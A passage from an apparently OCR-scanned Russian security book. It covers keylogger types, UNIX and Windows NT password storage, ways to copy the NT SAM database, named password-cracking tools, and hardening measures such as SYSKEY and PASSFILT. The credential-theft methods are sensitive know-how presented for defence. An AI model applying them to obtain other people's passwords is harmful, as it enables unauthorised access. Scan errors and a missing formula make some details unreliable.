Перехват пароля зачастую облегчают сами разработчики операционных систем, которые не затрудняют себя созданием усложненных по форме приглашений пользователю зарегистрироваться для входа в систему. Подобное пренебрежительное отношение характерно для большинства версий операционной системы UNIX, в которых регистрационное приглашение состоит из двух текстовых строк, выдаваемых поочередно на экран терминала:

login:

password:

Чтобы подделать такое приглашение, не нужно быть семи пядей во лбу. Однако само по себе усложнение внешнего вида приглашения не создает для хакера, задумавшего внедрить в операционную систему имитатор, каких-либо непреодолимых препятствий. Для этого требуется прибегнуть к более сложным и изощренным мерам защиты. В качестве примера операционной системы, в которой такие меры в достаточно полном объеме реализованы на практике, можно привести Windows NT.

Системный процесс WinLogon, отвечающий в операционной системе Windows NT за аутентификацию пользователей, имеет свой собственный рабочий стол — совокупность окон, одновременно видимых на экране дисплея. Этот рабочий стол называется столом аутентификации. Никакой другой Процесс, в том числе и имитатор, не имеет доступа к рабочему столу аутентификации и не может расположить на нем свое окно.

После запуска Windows NT на экране компьютера возникает так называемое начальное окно рабочего стола аутентификации, содержащее указание нажать на клавиатуре клавиши <Ctrl>+<Alt>+<Del>. Сообщение о нажатии этих клавиш передается только системному процессу WinLogon, а для остальных процессов, в частности, для всех прикладных программ, их нажатие происходит совершенно незаметно. Далее производится переключение на другое, так называемое регистрационное окно рабочего стола аутентификации. В нем-то как раз и размещается приглашение пользователю ввести свое идентификационное имя и пароль, которые будут восприняты и проверены процессом WinLogon.

Для перехвата пользовательского пароля внедренный в Windows NT имитатор обязательно должен уметь обрабатывать нажатие пользователем клавиш <Ctrl>+<Alt>+<Del>. В противном случае произойдет переключение на регистрационное окно рабочего стола аутентификации, имитатор станет неактивным и не сможет ничего перехватить, поскольку все символы пароля, введенные пользователем, минуют имитатор и станут достоянием исключительно системного процесса WinLogon. Как уже говорилось, процедура регистрации в Windows NT устроена таким образом, что нажатие клавиш <Ctrl>+<Alt>+<Del> проходит бесследно для всех процессов, кроме WinLogon, и поэтому пользовательский пароль поступит именно ему.

Конечно, имитатор может попытаться воспроизвести не начальное окно рабочего стола аутентификации (в котором высвечивается указание пользователю одновременно нажать клавиши <Ctrl>+<Alt>+<Del>), а регистрационное (где содержится приглашение ввести идентификационное имя и пароль пользователя). Однако при отсутствии имитаторов в системе регистрационное окно автоматически заменяется на начальное по прошествии короткого промежутка времени (в зависимости от версии Window NT он может продолжаться от 30 с до 1 мин), если в течение этого промежутка пользователь не предпринимает никаких попыток зарегистрироваться в системе. Таким образом, сам факт слишком долгого присутствия на экране регистрационного окна должен насторожить пользователя Windows NT и заставить его тщательно проверить свою компьютерную систему на предмет наличия в ней программных закладок.

Подводя итог сказанному, можно отметить, что степень защищенности Windows NT от имитаторов достаточно высока. Рассмотрение защитных механизмов, реализованных в этой операционной системе, позволяет сформулировать два необходимых условия, соблюдение которых является обязательным для обеспечения надежной защиты от имитаторов:

  • системный процесс, который при входе пользователя в систему получает от него соответствующие регистрационное имя и пароль, должен иметь свой собственный рабочий стол, недоступный другим процессам;
  • переключение на регистрационное окно рабочего стола аутентификации должно происходить абсолютно незаметно для прикладных программ, которые к тому же никак не могут повлиять на это переключение (например, запретить его).

К сожалению, эти два условия ни в одной из операционных систем, за исключением Windows NT, не соблюдаются. Поэтому для повышения их защищенности от имитаторов можно порекомендовать воспользоваться административными мерами. Например, обязать каждого пользователя немедленно сообщать системному администратору, когда вход в систему оказывается невозможен с первого раза, несмотря на корректно заданное идентификационное имя и правильно набранный пароль.

Фильтры

Фильтры "охотятся" за всеми данными, которые пользователь операционной системы вводит с клавиатуры компьютера. Самые элементарные фильтры просто сбрасывают перехваченный клавиатурный ввод на жесткий диск или в какое-то другое место, к которому имеет доступ злоумышленник. Более, изощренные программные закладки этого типа подвергают перехваченные данные анализу и отфильтровывают информацию, имеющую отношение к пользовательским паролям.

Фильтры являются резидентными программами, перехватывающими одно или несколько прерываний, которые связаны с обработкой сигналов от клавиатуры. Эти прерывания возвращают информацию о нажатой клавише и введенном символе, которая анализируется фильтрами на предмет выявления данных, имеющих отношение к паролю пользователя.

Известны несколько фильтров, созданных специально для различных версий операционной системы DOS. В 1997 г. отмечено появление фильтров для операционных систем Windows 3.11 и Windows 95.

Надо сказать, что изготовить подобного рода программную закладку не составляет большого труда. В операционных системах Windows 3.11 и Windows 95/98 предусмотрен специальный программный механизм, с помощью Которого в них решается ряд задач, связанных с получением доступа к вводу с клавиатуры, в том числе и проблема поддержки национальных раскладок клавиатур. К примеру, любой клавиатурный русификатор для Windows представляет собой самый что ни на есть настоящий фильтр, поскольку призван перехватывать все данные, вводимые пользователем с клавиатуры компьютера. Нетрудно "доработать" его таким образом, чтобы вместе со своей основной функцией (поддержка национальной раскладки клавиатуры) он заодно выполнял бы и действия по перехвату паролей. Тем более, что но . многих учебных пособиях и руководствах пользователя операционных систем Windows имеются исходные тексты программных русификаторов клавиатуры. "Перепрофилировав" этот русификатор так, чтобы он взял на себя выполнение функций клавиатурного шпиона, его можно встроить перед настоящим русификатором или после него, и в результате вся информация. 4 вводимая пользователем с клавиатуры, пойдет и через клавиатурного шпиона. Таким образом задача создания фильтра становится такой простой, что не требует наличия каких-либо специальных знаний у злоумышленника. Ему остается только незаметно внедрить изготовленную им программную  закладку в операционную систему и умело замаскировать ее присутствие.

В общем случае можно утверждать, что если в операционной системе разрешается переключать клавиатурную раскладку во время ввода пароля, то для этой операционной системы возможно создание фильтра. Поэтому, чтобы обезопасить ее от фильтров, необходимо обеспечить выполнение следующих трех условий:

  • во время ввода пароля переключение раскладок клавиатуры не разрешается ;
  • конфигурировать цепочку программных модулей, участвующих в работе с паролем пользователя, может только системный администратор;
  • доступ к файлам этих модулей имеет исключительно системный администратор.

Соблюсти первое из этих условий в локализованных для России версиях операционных систем принципиально невозможно. Дело в том, что средства создания учетных пользовательских записей на русском языке являются неотъемлемой частью таких систем. Только в англоязычных версиях систем Windows NT и UNIX предусмотрены возможности, позволяющие поддерживать уровень безопасности, при котором соблюдаются все 3 перечисленные условия.

Заместители

Заместители полностью или частично подменяют собой программные модули операционной системы, отвечающие за аутентификацию пользователей. Подобного рода клавиатурные шпионы могут быть созданы для работы в среде практически любой многопользовательской операционной системы. Трудоемкость написания заместителя определяется сложностью алгоритмов, реализуемых подсистемой аутентификации, и интерфейсов между ее отдельными модулями. Также при оценке трудоемкости следует принимать во внимание степень документированности этой подсистемы. В целом можно сказать, что задача создания заместителя значительно сложнее задачи написания имитатора или фильтра. Поэтому фактов использования подобного рода программных закладок злоумышленниками пока отмечено не было. Однако в связи с тем, что в настоящее время все большее распространение получает операционная система Windows NT, имеющая мощные средства защиты от имитаторов и фильтров, в самом скором будущем от хакеров следует ожидать более активного использования заместителей в целях получения несанкционированного доступа к компьютерным системам.

Поскольку заместители берут на себя выполнение функций подсистемы аутентификации, перед тем как приступить к перехвату пользовательских паролей они должны выполнить следующие действия:

  • подобно компьютерному вирусу внедриться в один или несколько системных файлов;
  • использовать интерфейсные связи между программными модулями полсистемы аутентификации для встраивания себя в цепочку обработки введенного пользователем пароля.

Для того чтобы защитить систему от внедрения заместителя, ее администраторы должны строго соблюдать адекватную политику безопасности. И что особенно важно, подсистема аутентификации должна быть одним из самых защищенных элементов операционной системы. Однако, как показываем практика, администраторы, подобно всем людям, склонны к совершению ошибок. А следовательно, соблюдение адекватной политики безопасности в течение неограниченного периода времени является невыполнимой задачей. Кроме того, как только заместитель попал в компьютерную систему, любые меры зашиты от внедрения программных закладок перестают быть адекватными, и поэтому необходимо предусмотреть возможность использования эффективных средств обнаружения и удаления внедренных клавиатурных шпионов. Это значит, что администратор должен вести самый тщательный контроль целостности исполняемых системных файлов и интерфейсных функций, используемых подсистемой аутентификации для решения своих задач.

Но и эти меры могут оказаться недостаточно эффективными. Ведь машинный код заместителя выполняется в контексте операционной системы, и поэтому заместитель может предпринимать особые меры, чтобы максимально затруднить собственное обнаружение. Например, он может перехватывать системные вызовы, используемые администратором для выявления программных закладок, с целью подмены возвращаемой ими информации. Или фильтровать сообщения, регистрируемые подсистемой аудита, чтобы отсеивать те, которые свидетельствуют о его присутствии в компьютере.

Как защитить систему от клавиатурных шпионов

Клавиатурные шпионы представляют реальную угрозу безопасности современных компьютерных систем. Чтобы отвести эту угрозу, требуется реализовать целый комплекс административных мер и программно-аппаратных средств защиты. Надежная защита от клавиатурных шпионов может быть построена только тогда, когда операционная система обладает определенными возможностями, затрудняющими работу клавиатурных шпионов. Они были подробно описаны выше, и не имеет смысла снова на них останавливаться.

Однако необходимо еще раз отметить, что единственной операционной системой, в которой построение такой защиты возможно, является Windows NT.

Да и то с оговорками, поскольку все равно ее придется снабдить дополнительными программными средствами, повышающими степень ее защищенности. В частности, в Windows NT необходимо ввести контроль целостности системных файлов и интерфейсных связей подсистемы аутентификации.

Кроме того, для надежной защиты от клавиатурных шпионов администратор операционной системы должен соблюдать политику безопасности, при которой только администратор может:

  •  конфигурировать цепочки программных модулей, участвующих в процессе аутентификации пользователей;
  • осуществлять доступ к файлам этих программных модулей;
  • конфигурировать саму подсистему аутентификации.

И наконец, при организации защиты от клавиатурных шпионов всегда следует иметь в виду, что ни неукоснительное соблюдение адекватной политики безопасности, ни использование операционной системы, имеющей в своем составе средства, существенно затрудняющие внедрение клавиатурных шпионов и облегчающие их своевременное обнаружение, ни дополнительная реализация контроля за целостностью системных файловой и интерфейсных связей сами по себе не могут служить залогом надежной защиты информации в компьютере. Все эти меры должны осуществляться в комплексе. Ведь жертвой клавиатурного шпиона может стать любой пользователь операционной системы, поскольку ее администраторы тоже люди, время от времени и они допускают ошибки в своей работе, а для внедрения клавиатурного шпиона достаточно всего одной оплошности администратора.

 

Глава 3. Парольная защита операционных систем

Глава 3. Парольная защита операционных систем

1. Парольные взломщики

 

Парольные взломщики

Проблему безопасности компьютерных сетей надуманной не назовешь. Практика показывает: чем масштабнее сеть и чем более ценная информация доверяется подключенным к ней компьютерам, тем больше находится желающих нарушить ее нормальное функционирование ради материальной выгоды или просто из праздного любопытства. В самой крупной компьютерной сети в мире (Internet) атаки на компьютерные системы возникают подобно волнам цунами, сметая все защитные барьеры и оставляя после себя впавшие в паралич компьютеры и опустошенные винчестеры. Эти атаки не знают государственных границ. Идет постоянная виртуальная война, в ходе которой организованности системных администраторов противостоит изобретательность компьютерных взломщиков.

Основным защитным рубежом против злонамеренных атак в компьютерной сети является система парольной защиты, которая имеется во всех современных операционных системах. В соответствии с установившейся практикой перед началом сеанса работы с операционной системой пользователь обязан зарегистрироваться, сообщив ей свое имя и пароль. Имя требуется операционной системе для идентификации пользователя, а пароль служит подтверждением правильности произведенной идентификации. Информация, введенная пользователем в диалоговом режиме, сравнивается с топ. что имеется в распоряжении операционной системы. Если проверка лает положительный результат, то пользователю становятся доступны все ресурсы операционной системы, связанные с его именем.

Что такое парольный взломщик

Трудно представить, что сегодня какому-нибудь злоумышленнику может придти в голову шальная мысль о том, чтобы попытаться подобрать имя и пароль для входа в операционную систему, по очереди перебирая в уме все возможные варианты и вводя их с клавиатуры. Скорость такого подбора пароля будет чрезвычайно низкой, тем более что в операционных системах с хорошо продуманной парольной защитой количество подряд идущих повторных вводов конкретного пользовательского имени и соответствующего ему пароля всегда можно ограничить двумя-тремя и сделать так, что если это число будет превышено, то вход в систему с использованием данного имени блокируется в течение фиксированного периода времени или до прихода системного администратора.

Гораздо более эффективным является другой метод взлома парольной защиты операционной системы, при котором атаке подвергается системный файл, содержащий информацию о ее легальных пользователях и их паролях. Однако любая современная операционная система надежно защищает при помощи шифрования пользовательские пароли, которые хранятся в этом файле. Доступ к таким файлам, как правило, по умолчанию запрещен даже для системных администраторов, не говоря уже о рядовых пользователях. Тем не менее, в ряде случаев злоумышленнику удается путем различных ухищрений получить в свое распоряжение файл с именами пользователей и их зашифрованными паролями. И тогда ему на помощь приходят так называемые парольные взломщики — специализированные программы, которые служат для взлома паролей операционных систем.

Как работает парольный взломщик

Криптографические алгоритмы, применяемые для шифрования паролей пользователей в современных операционных системах, в подавляющем большинстве случаев являются слишком стойкими, чтобы можно было надеяться отыскать методы их дешифрования, которые окажутся более эффективными, чем тривиальный перебор возможных вариантов. Поэтому парольные взломщики иногда просто шифруют все пароли с использованием того же самого криптографического алгоритма, который применяется для их засекречивания в атакуемой операционной системе, и сравнивают результаты шифрования с тем, что записано в системном файле, где находятся шифрованные пароли ее пользователей. При этом в качестве вариантов паролей парольные взломщики используют символьные последовательности, автоматически генерируемые из некоторого набора символов. Данный способ позволяет взломать все пароли, если известно их представление в зашифрованном виде и они содержат только символы из данного набора. Максимальное время, которое потребуется для взлома пароля, можно вычислить по следующей формуле:

где N — число символов в наборе, L — предельная длина пароля, S — количество проверок в секунду (зависит от операционной системы и быстродействия компьютера, на котором производится взлом ее парольной защиты).

Из приведенной формулы видно, что за счет очень большого числа перебираемых комбинаций, которое растет экспоненциально с увеличением чист символов в исходном наборе, такие атаки парольной защиты операционной системы могут занимать слишком много времени. Однако хорошо известно, что большинство пользователей операционных систем не затрудняют себя выбором стойких паролей (т. е. таких, которые трудно взломать). Поэтом) для более эффективного подбора паролей парольные взломщики обычно используют так называемые словари, представляющие собой заранее сформированный список слов, наиболее часто применяемых на практике в качестве паролей.

Для каждого слова из словаря парольный взломщик использует одно или несколько правил. В соответствии с этими правилами слово изменяется и порождает дополнительное множество опробуемых паролей. Производится попеременное изменение буквенного регистра, в котором набрано слово, порядок следования букв в слове меняется на обратный, в начало и в конец каждого слова приписывается цифра 1, некоторые буквы заменяются на близкие по начертанию цифры (в результате, например, из слова password получается pa55wOrd). Это повышает вероятность подбора пароля, поскольку в современных операционных системах, как правило, различаются пароли, набранные г заглавными и строчными буквами, а пользователям этих систем настоятельно рекомендуется выбирать пароли, в которых буквы чередуются с цифрами.

Одни парольные взломщики поочередно проверяют каждое слово из словаря, применяя к нему определенный набор правил для генерации дополнительного множества опробуемых паролей. Другие предварительно обрабатывают весь словарь при помощи этих же правил, получая новый словарь большего размера, и затем из него черпают проверяемые пароли. Учитывая, что обычные словари человеческих языков состоят всего из нескольких сотен тысяч слов, а скорость шифрования паролей достаточно высока, парольные взломщики, осуществляющие поиск с использованием словаря работают достаточно быстро.

Пользовательский интерфейс подавляющего большинства парольных взломщиков трудно назвать дружественным. После их запуска на экране Дисплея, как правило, появляется лаконичный запрос File?, означающий, что необходимо ввести имя файла, где хранится словарь. Да и документацию к парольным взломщикам обильной не назовешь. Правда, для этого есть свои объективные причины.

Во-первых, парольные взломщики предназначены исключительно для подбора паролей. Такая узкая специализация не способствует разнообразию их интерфейса и обилию сопроводительной документации.

Во-вторых, авторами большей части парольных взломщиков являются люди компьютерного подполья, которые создают их "на лету" для удовлетворения собственных сиюминутных потребностей, и поэтому редко снабжают их подробной документацией и встроенными справочными системами. Приятное исключение из этого правила составляют только парольные взломщики, созданные специалистами в области компьютерной безопасности для выявления слабостей в парольной защите операционных систем. В этом случае дистрибутив парольного взломщика, помимо самой программы, обязательно включает разнообразные дополнительные сведения, касающиеся технических сторон ее эксплуатации, а также небольшой словарь.

 

2. Взлом парольной защиты операционной системы UNIX

Взлом парольной защиты операционной системы UNIX

В операционной системе UNIX информацию о пароле любого пользователя можно отыскать в файле passwd, находящемся в каталоге etc. Эта информация хранится в зашифрованном виде и располагается через двоеточие сразу после имени соответствующего пользователя. Например, запись, сделанная в файле passwd относительно пользователя с именем bill, будет выглядеть примерно так:

bill:5fg63fhD3d5g:9406:12:Bill Spencer:/home/fsg/will:/bin/bash

Здесь 5fg63fhD3d5g — это и есть информация о пароле пользователя bill.

При первоначальном задании или изменении пользовательского пароля операционная система UNIX генерирует два случайных байта (в приведенном выше примере 5 и f) к которым добавляются байты пароля. Полученная в результате байтовая строка шифруется при помощи специальной криптографической процедуры Crypt2 (в качестве ключа используется пароль пользователя) и в зашифрованном виде (g63fliD3d5g) вместе с двумя случайными байтами (5f) записывается в файл /etc/passwd после имени пользователя и двоеточия.

Если злоумышленник имеет доступ к парольному файлу операционной системы UNIX, то он может скопировать этот файл на свой компьютер и затем воспользоваться одной из программ для взлома парольной защиты UNIX.

Самой эффективной и популярной такой программой является Crack. И хотя она предназначена для запуска на компьютерах, работающих только по.: управлением операционных систем семейства UNIX, инициируемый ею процесс поиска паролей может быть без особых усилий распределен междх различными платформами, подключенными к единой компьютерной сет. Среди них могут оказаться и IBM-совместимые персональные компьютеры , с операционной системой Linux, и рабочие станции RS/6000 с AIX. и Macintosh с A/UX.

CrackJack — еще одна известная программа для взлома паролей операционной системы UNIX. К сожалению, работает она только под управлением операционной системы DOS, но зато весьма непритязательна в том, что касается компьютерных ресурсов. К другим недостаткам этого парольною взломщика можно отнести запрет на одновременное использование сразу нескольких словарей и принципиальную невозможность запуска CrackJack под Windows 95/98.

В отличие от CrackJack, парольный взломщик PaceCrack95 работает пол Windows 95/98 в качестве полноценного DOS-приложения. К тому же он достаточно быстр, компактен и эффективен.

Парольные взломщики Q-Crack и John the Ripper примечательны тем, что существуют версии этих взломщиков, предназначенные для работы не только на DOS/Windows-платформах, но и на компьютерах с операционной системой Linux.

А парольный взломщик Hades лучше остальных документирован и содержит ряд очень полезных утилит, которые позволяют осуществлять слияние нескольких словарей в один большой словарь, удалять из словаря повторяющиеся слова и добавлять в уже имеющийся словарь пароли, взломанные в процессе работы Hades.

Существует множество других программ взлома паролей операционной системы UNIX. Они устойчивы к сбоям электропитания компьютеров, на которых работают (XiT), позволяют планировать время своей работы (Star Cracker), при выполнении монополизируют процессор для достижения максимальной производительности (Killer Cracker), не только взламывают пароли операционной системы UNIX, но и помогают преодолеть парольную защиту других программ, которые требуют, чтобы пользователь зарегистрировался путем ввода своего имени и соответствующего пароля (Claymore).

Что же касается защиты от взлома паролей операционной системы UNIX, то ее пользователям следует настоятельно порекомендовать применять только стойкие пароли, а в качестве критерия стойкости пароля использовать его отсутствие в словарях, предназначенных для парольных взломщиков. Да и сами файлы с информацией о пользовательских паролях следует прятать подальше от посторонних любопытных глаз. Достигается это обычно с помощью так называемого затенения (shadowing), когда в файле passwd шифрованные пароли пользователей заменяются служебными символами (например, звездочками), а вся парольная информация скрывается в каком-нибудь укромном месте. И хотя существуют программы, специально созданные для отыскания спрятанных парольных файлов операционной системы UNIX, к счастью для системных администраторов эти программы далеко не универсальны и успешно срабатывают не для всех операционных систем семейства UNIX.

3. Взлом парольной защиты операционной системы Windows NT

Взлом парольной защиты операционной системы Windows NT

База данных учетных записей пользователей

Одним из основных компонентов системы безопасности Windows NT является диспетчер учетных записей пользователей. Он обеспечивает взаимодействие других компонентов системы безопасности, приложений и служб Windows NT с базой данных учетных записей пользователей (Security Account Management Database, SAM). Эта база обязательно имеется на каждом компьютере с операционной системой Windows NT. В ней хранится вся информация, используемая для аутентификации пользователей Windows NT при интерактивном входе в систему и при удаленном доступе к ней по компьютерной сети.

База данных SAM представляет собой один из кустов (hive) системного реестра (registry) Windows NT. Этот куст принадлежит ветви (subtree) HKEY_LOCAL_MACHINE и называется SAM. Он располагается в каталоге \wmnt_root\System32\ConfIg (winnt_root — условное обозначение каталога с системными файлами Windows NT) в отдельном файле, который тоже называется SAM.

Информация в базе данных SAM хранится в основном в двоичном виде. Доступ к ней обычно осуществляется через диспетчер учетных записей. Изменять записи, находящиеся в базе данных SAM, при помощи программ, позволяющих напрямую редактировать реестр Windows NT (REGEDT или REGEDT32), не рекомендуется. По умолчанию этого и нельзя делать, т. к. доступ к базе данных SAM запрещен для всех без исключения категорий пользователей операционной системы Windows NT.

Хранение паролей пользователей

Именно в учетных записях базы данных SAM находится информация о пользовательских именах и паролях, которая необходима для идентификации и аутентификации пользователей при их интерактивном входе в систему. Как и в любой другой современной многопользовательской операционной системе, эта информация хранится в зашифрованном виде. В базе данных SAM каждый пароль пользователя обычно бывает представлен в виде двух 16-байтовых последовательностей, полученных разными методами.

При использовании первого метода строка символов пользовательского пароля хэшируется с помощью функции MD4. В итоге из символьного пароля, введенного пользователем, получается 16-байтовая последовательность — хэшированный пароль Windows NT. Данная последовательность затем шифруется по DES-алгоритму5, и результат шифрования сохраняется в базе данных SAM. При этом в качестве ключа используется так называемый относительный идентификатор пользователя (Relative Identifier, RID), который представляет собой автоматически увеличивающийся порядковый номер учетной записи данного пользователя в базе данных SAM.

Для совместимости с другим программным обеспечением корпорации Microsoft (Windows for Workgroups, Windows 95/98 и Lan Manager) в базе данных SAM хранится также информация о пароле пользователя в стандарте Lan Manager. Для ее формирования используется второй метод. Все буквенные символы исходной строки пользовательского пароля приводятся к верхнему регистру, и, если пароль содержит меньше 14 символов, то он дополняется нулями. Из каждой 7-байтовой половины преобразованного таким образом пароля пользователя отдельно формируется ключ для шифрования фиксированной 8-байтовой последовательности по DES-алгоритму. Полученные в результате две 8-байтовые половины хэшированного пароля Lan Manager еще раз шифруются по DES-алгоритму (при этом в качестве ключа используется RID пользователя) и помещаются в базу данных SAM.

Использование пароля

Информация о паролях, занесенная в базу данных SAM, служит для аутентификации пользователей Windows NT. При интерактивном или сетевом входе в систему введенный пользователем пароль сначала хэшируется и шифруется, а затем сравнивается с 16-байтовой последовательностью, записанной в базе данных SAM. Если они совпадают, пользователю разрешается вход в систему.

Обычно в базе данных SAM хранятся в зашифрованном виде оба хэшированных пароля. Однако в некоторых случаях операционная система вычисляет только один из них. Например, если пользователь домена Windows NT изменит свой пароль, работая на компьютере с Windows for Workgroups, то в его учетной записи останется только пароль Lan Manager. А если пользовательский пароль содержит более 14 символов или если эти символы не входят в так называемый набор поставщика оборудования (original equipment manufacturer, OEM), то в базу данных SAM будет занесен только пароль Windows NT.

Возможные атаки на базу данных SAM

Обычно основным предметом вожделения, испытываемого взломщиком парольной защиты операционной системы, являются административные полномочия. Их можно получить, узнав в хэшированием или символьном виде пароль администратора системы, который хранится в базе данных SAM. Поэтому именно на базу данных SAM бывает направлен главный удар взломщика парольной защиты Windows NT.

По умолчанию в операционной системе Windows NT доступ к файлу \winnt_root\System32\Config\SAM заблокирован для всех без исключения ее пользователей. Тем не менее, с помощью программы NTBACKUP любой обладатель права на резервное копирование файлов и каталогов Windows NT может перенести этот файл с жесткого диска на магнитную ленту. Резервную копию реестра также можно создать утилитой REG ВАК из Windows NT Resource Kit. Кроме того, несомненный интерес для любого взломщика представляют резервная копия файла SAM (SAM.SAV) в каталоге \winnt_root\System32\Config и сжатая архивная копия SAM (файл SAM._) в каталоге \winnt_root\Repair.

При наличии физической копии файла SAM извлечь хранимую в нем информацию не представляет никакого труда. Загрузив файл SAM в реестр любого другого компьютера с Windows NT (например, с помощью команды Load Hive программы REGEDT32), можно в деталях изучить учетные записи пользователей, чтобы определить значения RID пользователей и шифрованные варианты их хэшированных паролей. Зная RID пользователя и имея зашифрованную версию его хэшированного пароля, компьютерный взломщик может попытаться расшифровать этот пароль, чтобы использовать его, например, для получения сетевого доступа к другому компьютеру. Однако для интерактивного входа в систему одного лишь знания хэшированного пароля недостаточно. Необходимо получить его символьное представление.

Для восстановления пользовательских паролей операционной системы Windows NT в символьном виде существуют специальные парольные взломщики, которые выполняют как прямой подбор паролей, так и поиск по словарю, а также используют комбинированный метод взлома парольной зашиты, когда в качестве словаря задействуется файл с заранее вычисленными хэшированными паролями, соответствующими символьным последовательностям, которые часто применяются в качестве паролей пользователей операционных систем. Одной из самых известных программ взлома паролей операционной системы Windows NT является LOphtCrack (http://www.10pht.com/IOphtcrack/).

Другим распространенным парольным взломщиком Windows NT является Advanced NT Security Explorer (сокращенно — ANTExp). Его можно найти в Internet по адресу http://www.elcomsoft.com/antexp.html. ANTExp имеет удобный пользовательский интерфейс. Пользователь может задать набор символов, из которых будут формироваться последовательности, используемые в качестве вариантов паролей, а также верхнюю и нижнюю границу длины перебираемых паролей. Кроме того, можно выбрать тип атаки на парольную защиту Windows NT и применить либо атаку методом "грубой силы", либо словарную атаку.

Защита системы от парольных взломщиков

Итак, вывод однозначен: одна из главных задач системного администратора Windows NT состоит в защите от несанкционированного доступа той информации, которая хранится в базе данных SAM. С этой целью ему, прежде всего, необходимо ограничить физический доступ к компьютерам сети и прежде всего — к контроллерам доменов. Дополнительно, при наличии соответствующих программно-аппаратных средств, следует установить пароли BIOS на включение компьютеров и на изменение настроек BIOS. Затем, , используя настройки BIOS, рекомендуется отключить загрузку компьютеров с гибких и компакт-дисков. А для обеспечения контроля доступа к файлам и папкам операционной системы Windows NT системный раздел жесткою диска должен иметь формат NTFS.

Каталог \winnt_root\repair нужно средствами операционной системы закрыть для доступа всех пользователей, включая администраторов, и разрешать к ней доступ только во время работы утилиты RDISK, создающей в этом каталоге архивные копии системного реестра Windows NT. Системные администраторы также должны внимательно следить за тем, где и как хранятся дискеты аварийного восстановления (Emergency Repair Disks) и архивные копии на магнитных лентах, если на последних присутствует дубликат системного реестра Windows NT.

Если компьютер с операционной системой Windows NT входит в домен, то по умолчанию имена и хэшированные пароли последних 10-ти пользователей, регистрировавшихся на этом компьютере, сохраняются (кэшируются) в его локальном системном реестре (в разделе SECURITY\Policy\Secrets куста HKEY LOCAL_MACHINE). Чтобы отменить кэширование паролей на компьютерах домена, нужно с помощью утилиты REGEDT32 в раздел Micro-soft\WindowsNT\CurrentVersion\Winlogon куста HKEY_LOCAL MACHINE добавить параметр CashedLogonsCount, установив его значение равным нулю, а тип — REG_SZ.

Для защиты базы данных SAM можно применить утилиту SYSKEY, входящую в состав пакета обновления Windows NT Service Pack 3. Эта утилита позволяет включить режим дополнительного шифрования информации о паролях, которая хранится в базе данных SAM. Уникальный 128-битовый ключ для дополнительного шифрования паролей (так называемый ключ шифрования паролей — Password Encryption Key, РЕК) автоматически сохраняется в системном реестре для дальнейшего использования.

Перед помещением в системный реестр ключ РЕК шифруется при помощи Другого 128-битового ключа, который называется системным ключом (System Key), и может храниться либо в системном реестре, либо в файле с именем STARTUP.KEY в корневом каталоге на отдельной дискете. Можно не сохранять системный ключ на магнитном носителе, и тогда каждый раз при запуске операционной системы он будет вычисляться с помощью алгоритма MD5 на основе пароля, набираемого на клавиатуре в диалоговом окне утилиты SYSKEY. Последние два способа хранения системного ключа обеспечивают максимальную защиту паролей в базе данных SAM, однако приводят к невозможности автоматической перезагрузки операционной системы, поскольку для завершения процесса перезагрузки потребуется либо вставить дискету с системным ключом и подтвердить ее наличие в дисководе путем нажатия кнопки ОК в появившемся диалоговом окне, либо вручную ввести системный ключ с клавиатуры.

Для повышения стойкости паролей пользователей операционной системы Windows NT ко взлому рекомендуется с помощью утилиты Диспетчер пользователей (User Manager) задать минимальную длину пользовательских паролей равной не менее 8 символов и включить режим устаревания паролей, чтобы пользователи периодически их обновляли. При этом чем выше вероятность атак на парольную защиту Windows NT, тем короче должен быть срок такого устаревания. А чтобы пользователи не вводили свои старые пароли повторно, необходимо включить режим хранения некоторого числа ранее использовавшихся паролей.

Утилита PASSPROP из состава Windows NT Resource Kit, запущенная с ключом /COMPLEX, заставляет пользователей вводить более устойчивые пароли, которые или сочетают буквы в разном регистре, или буквы с цифрами, или буквы со специальными символами. Более строгие правила фильтрации нестойких паролей можно задать после установки любого из пакетов обновления Windows NT, начиная с Service Pack 2. Тогда специальная библиотека PASSFJLT.DLL, находящаяся в каталоге \winnt_root\System32, будет следить за тем, чтобы каждый пользовательский   пароль состоял не менее чем из 5 символов, не содержал имени пользователя, включал символы, по крайней мере, трех наборов из четырех возможных, составленных из прописных букв, строчных букв, цифр и специальных символов (знаков препинания и т. д.) соответственно. Чтобы задать такой режим проверки паролей пользователей, необходимо в раздел HKEY_LOCAL_MACHINE\SYSTEM\CurrentControISet\Control\Lsa системного реестра с помощью программы REGEDT32 добавить параметр Noti fi cation Packages типа REG_MULTI_SZ и вписать в него строку PASSFILT Если этот параметр уже имеется, то новую строку следует дописать после уже существующей.

В заключение необходимо отметить, что хотя в умелых руках злоумышленника программы взлома паролей операционных систем представляют огромную опасность для их парольной защиты, сами парольные взломщики все же являются не менее ценным инструментом для системных администраторов, которые заинтересованы в выявлении слабых мест в парольной защите своих операционных систем. Основная проблема состоит не в том ч го на свете существуют парольные взломщики, а в том, что ими недостаточно часто пользуются системные администраторы. Надеюсь, что после выхода в свет этой книги положение дел изменится к лучшему.

4. Как сделать парольную защиту Windows 95/98 более надежной

 

В настоящее время Windows корпорации Microsoft является наиболее распространенной операционной системой. Подавляющее большинство компьютеров, которые повсеместно используются для решения самых разнообразных задач, функционируют именно под ее управлением.

Однако, признавая отменные потребительские качества операционных систем корпорации Microsoft, нельзя обойти вниманием имеющиеся в них значительные изъяны. В первую очередь, это касается парольной зашиты Windows 95 и Windows 98. Фактически парольная защита в Windows 98 осталась на прежнем уровне по сравнению с Windows 95. Поэтому все сказанное в ходе дальнейшего изложения в равной степени относится к ним обеим. А следовательно, рассматривая парольную защиту Windows 95 и Windows 98, можно вести речь не о двух отдельных операционных системах, а о единой, обобщенной операционной системе, которую будем условно называть Windows 95/98.

Далеко не все пользователи знают, что для парольной защиты Windows 95/98 характерны существенные недостатки, связанные с тем, что при ее разработке корпорация Microsoft не уделила должного внимания проблемам безопасности компьютеров, для которых предназначалась эта операционная система. Рассмотрим подробнее, что представляет собой парольная защита в Windows 95/98, какие у нее имеются изъяны и как от них избавиться средствами самой операционной системы.

Как установить парольную защиту Windows 95/98

Чтобы установить парольную защиту в Windows 95/98, необходимо выполнить следующую процедуру:

1. Дважды щелкните левой кнопкой мыши на пиктограмме Мой компьютер (My Computer).

2. Теперь дважды щелкните на пиктограмме Панель управления (Control Panel). Если вы не можете отыскать пиктограмму Мой компьютер (My Computer), щелкните на кнопке Пуск (Start), выберите раздел Настройка (Settings), затем Панель управления (Control Panel) и перейдите к пункту 3.

